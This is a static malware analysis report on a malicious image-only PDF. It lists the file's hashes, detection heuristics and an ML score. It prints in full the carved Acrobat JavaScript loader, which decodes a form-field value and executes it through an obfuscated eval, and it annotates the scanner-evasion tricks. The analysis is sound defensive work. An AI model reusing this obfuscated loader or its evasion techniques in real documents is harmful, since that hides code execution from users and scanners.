Malicious PDF — malware analysis report

Static analysis result for SHA-256 dd4fb331655e1ab4…

MALICIOUS

PDF

44.4 KB Created: 2012-07-14 02:26:33 +04:00 Authoring application: Adobe Acrobat 7.0 (via Adobe Acrobat 7.0 Image Conversion Plug-in) First seen: 2026-05-09
MD5: b5845dda0b3360bbcac1de8afd55b5aa SHA-1: 72311de9673beb2320617beeb0cda13e9219b320 SHA-256: dd4fb331655e1ab4af8345523a53cc9d341a2c034c9c7cb23474f6f3401b5fd0
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell — note: nothing in this report evidences PowerShell; the only execution behavior visible is Acrobat JavaScript run from the embedded /JS object (T1059.007 JavaScript), so this mapping should be verified before being used for detection or reporting.

The PDF contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS, and the ML classifier strongly flagged it as malicious. The document body is image-only (one image XObject, no text operators), consistent with a lure that delivers its content as rendered pixels. The extracted artifact 'javascript_obj0106_000.js' is a decoder/loader rather than the payload itself: it reads the value of form field "Text1", decodes it (each ':'- or ','-separated number is one payload byte multiplied by 3, converted to a two-digit hex pair and then to a character), assembles the string "eval" from single characters of "true", "false" and a junk literal, and invokes it through app.alert.constructor (the Function constructor). The second stage therefore resides in the PDF's form field value rather than being fetched over the network; it was not recovered in this static pass, so its exact intent (exploit, downloader, or other) remains undetermined and the AcroForm /V value of "Text1" is the next artifact to extract.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9975

Heuristics 6

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function sadfjsadkl(str){return str.replace(/:/g,",");}
    function qwaerasdf(asd){return String.fromCharCode(asd);}
    function gqrqewfsdf(str){var set='';var s='';var ee='';
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LURE
    PDF has 1 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In PDF document text
    • http://ns.adobe.com/xap/1.0/ — In PDF document text
    • http://purl.org/dc/elements/1.1/ — In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/ — In PDF document text
    • http://ns.adobe.com/pdf/1.3/ — In PDF document text
    All five are standard RDF / XMP / Dublin Core namespace identifiers from the document's XMP metadata packet, not network indicators; none of them is referenced by the extracted JavaScript.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0106_000.js pdf-javascript-stream PDF /JS object 106 at offset 0xADB6 1543 bytes
SHA-256: c62c21adc4674d00f1358964c67e92f74a243680c0076314725c20f843160b2e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s) (String.fromCharCode). This count understates the script: the property name "eval" is assembled one character at a time from "true", "false" and a junk literal, and the Function constructor is reached via substring(52,63) of another junk literal, so neither "eval" nor "constructor" appears as a literal token and signature-based token counting misses the actual execution primitive.
Preview script
First 1,000 lines of the extracted script
// Analyst annotations: Acrobat JavaScript carved from /JS object 106.
// The script is a decoder + loader, not the payload: it reads the value of
// form field "Text1", turns that numeric string into characters, and passes
// the result to an eval reached through app.alert.constructor. Helper names
// are random filler; the live call chain is
//   dec -> gqrqewfsdf -> asdfqwef/dsjfassldfhgj -> hex2a -> qwaerasdf.
// The decoded second stage lives in the form field and is NOT in this artifact.
function rhjahahagk(){
// dec: numeric string -> hex string (stage 1) -> decoded characters (stage 2).
function dec(input2) {var asdf =gqrqewfsdf(input2) ; var asfdsad = hex2a(asdf); return asfdsad;}
// Returns "0" + s: 0/120 is 0, coerced to the string "0". Used to left-pad a
// single-digit hex value to two characters.
function dsjfassldfhgj(sadsfjkgAD){var jdhjkashfhaui = 0/120+""; return jdhjkashfhaui+sadsfjkgAD;}
// Normalises ':' separators to ',' so the encoded field may use either one.
function sadfjsadkl(str){return str.replace(/:/g,",");}
// Thin wrapper around String.fromCharCode; the argument is coerced to a number.
function qwaerasdf(asd){return String.fromCharCode(asd);}
// Stage 1: every ','/':'-separated number is divided by 3 and emitted as a hex
// pair, i.e. the field stores 3*byte for each payload byte. Values that are
// not multiples of 3 would yield fractional hex — presumably never the case.
function gqrqewfsdf(str){var set='';var s='';var ee='';
str = sadfjsadkl(str);
str = str.split(",");
for(var i=0;i<str.length;i++){  
ee=str[i]/3;
set+=asdfqwef(ee.toString(16));}
return set;}
// Pads a one-character hex value to two characters; longer values pass through.
function asdfqwef(eds){var set='';var s=eds;
if (s.length<2)
{set=dsjfassldfhgj(s);}
else{set=s;}
return set;}
// Stage 2: hex pairs -> characters. '...0x'.substr(20,2) is just "0x", so each
// iteration is String.fromCharCode("0x" + pair). 'zzz' is an unused decoy alias.
function hex2a(hex) {
    var str = '';var zzz=qwaerasdf;
    for (var i = 0; i < hex.length; i += 2){
	var sssss = hex.substr(i,2);
       str +=qwaerasdf('asdfwefwuiegfyuadsui0x'.substr(20,2)+sssss);
}return str;}
// Decoy helper: defined but never called.
function adsfquifhiwuf(d,dd){return d+dd;}
// Encoded payload source: the Acrobat form field "Text1" (getField is the
// Acrobat Doc-object API, which is why this cannot be run outside a PDF
// viewer). Recover the second stage from the AcroForm field's /V value.
var b2=getField("Text1");;
var ss=b2.value;
var ss=dec(ss);
// substring(52,63) of the junk literal is "constructor"; app.alert is a
// function, so this resolves to the Function constructor.
var czvhjashavsiodhvuipashcpioasdcs  = app.alert["hadsfuihuiahfuhauishzcnxvvjbasbvdiopjiovpasodjviopasconstructorkajdsfhjkasdhfjkhadskjlhvlaksjhdvdsklavh".substring(52,63)];
// Boolean-to-string helper used only to obtain the literals "true" and "false".
function asdfeaf(s){if (s==0){return false}else{return true}}
var susea=asdfeaf(1)+"";
var seasus=asdfeaf(0)+"";
var daeaefe="eafadsfjekafhjkavadfefafaef";
// Builds the property name "eval" one character at a time:
// "true"[3] = 'e', daeaefe[16] = 'v', "false"[1] = 'a', "false"[2] = 'l'.
var argqrgqadsfwqgwafdsfwef=susea[(3+3)/2];
argqrgqadsfwqgwafdsfwef+=daeaefe[(16+16)/2];
argqrgqadsfwqgwafdsfwef+=seasus[((1+9)/5)-1];
argqrgqadsfwqgwafdsfwef+=seasus[(2+10)/6];
// Function["eval"](decoded): executes the decoded field contents as script.
// NOTE(review): Function has no own "eval" property in modern ECMAScript;
// presumably this relies on the legacy Acrobat/SpiderMonkey behavior where
// eval is callable as an object method — confirm in a sandboxed Acrobat run.
// This indirection is why "eval" never appears as a literal token.
czvhjashavsiodhvuipashcpioasdcs[argqrgqadsfwqgwafdsfwef](ss);
}
// Self-invoking entry point: runs as soon as Acrobat executes /JS object 106
// (the triggering action type is not shown in this report).
rhjahahagk();